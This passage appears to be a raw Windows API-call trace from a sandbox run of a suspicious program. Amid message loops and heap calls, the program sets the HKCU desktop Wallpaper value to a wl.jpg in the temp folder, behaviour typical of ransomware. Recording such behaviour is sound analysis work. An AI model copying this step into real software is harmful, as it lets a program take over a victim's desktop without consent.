wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.315] Sleep (dwMilliseconds=0xa) [0242.331] timeGetTime () returned 0x117c800 [0242.331] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.331] Sleep (dwMilliseconds=0xa) [0242.355] timeGetTime () returned 0x117c80f [0242.356] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.356] Sleep (dwMilliseconds=0xa) [0242.386] timeGetTime () returned 0x117c82f [0242.386] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.386] Sleep (dwMilliseconds=0xa) [0242.411] timeGetTime () returned 0x117c84e [0242.411] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.411] Sleep (dwMilliseconds=0xa) [0242.425] timeGetTime () returned 0x117c85e [0242.425] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.425] Sleep (dwMilliseconds=0xa) [0242.441] timeGetTime () returned 0x117c86d [0242.441] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.441] Sleep (dwMilliseconds=0xa) [0242.457] timeGetTime () returned 0x117c87d [0242.457] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.457] Sleep (dwMilliseconds=0xa) [0242.471] timeGetTime () returned 0x117c88c [0242.471] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.471] Sleep (dwMilliseconds=0xa) [0242.488] timeGetTime () returned 0x117c89c [0242.488] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.488] Sleep (dwMilliseconds=0xa) [0242.503] timeGetTime () returned 0x117c8ac [0242.503] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.503] Sleep (dwMilliseconds=0xa) [0242.526] timeGetTime () returned 0x117c8bb [0242.526] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0242.526] Sleep (dwMilliseconds=0xa) [0242.550] timeGetTime () returned 0x117c8db [0242.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0242.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0242.550] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0242.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0242.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0242.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0242.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0242.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0242.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0242.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0242.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0242.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0242.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0242.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0242.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0242.551] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0242.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0242.551] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb420 [0242.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0242.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0242.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0242.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0242.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb420 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0242.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0242.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0242.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0242.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0242.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0242.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0242.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0242.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0242.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0242.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0242.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a733a8 [0242.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0242.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0242.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0242.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0242.553] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0242.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0242.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0242.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0242.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0242.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0242.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0242.553] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0242.553] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0242.553] RegCloseKey (hKey=0x4e0) returned 0x0 [0242.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a733a8 | out: hHeap=0x2af0000) returned 1 [0242.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0242.553] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0242.554] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0242.554] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0242.554] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0242.554] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0242.554] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0242.554] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0242.554] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0242.554] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0242.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0242.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0242.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0242.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0242.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0242.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0242.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0242.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0242.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0242.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0242.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0242.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0242.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0242.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0242.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0242.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0242.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0242.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0242.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0242.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0242.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0242.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0242.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0242.557] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0242.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0242.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0242.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0242.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0242.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0242.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0242.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0242.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0242.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0242.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0242.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0242.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0242.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0242.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0242.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0242.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 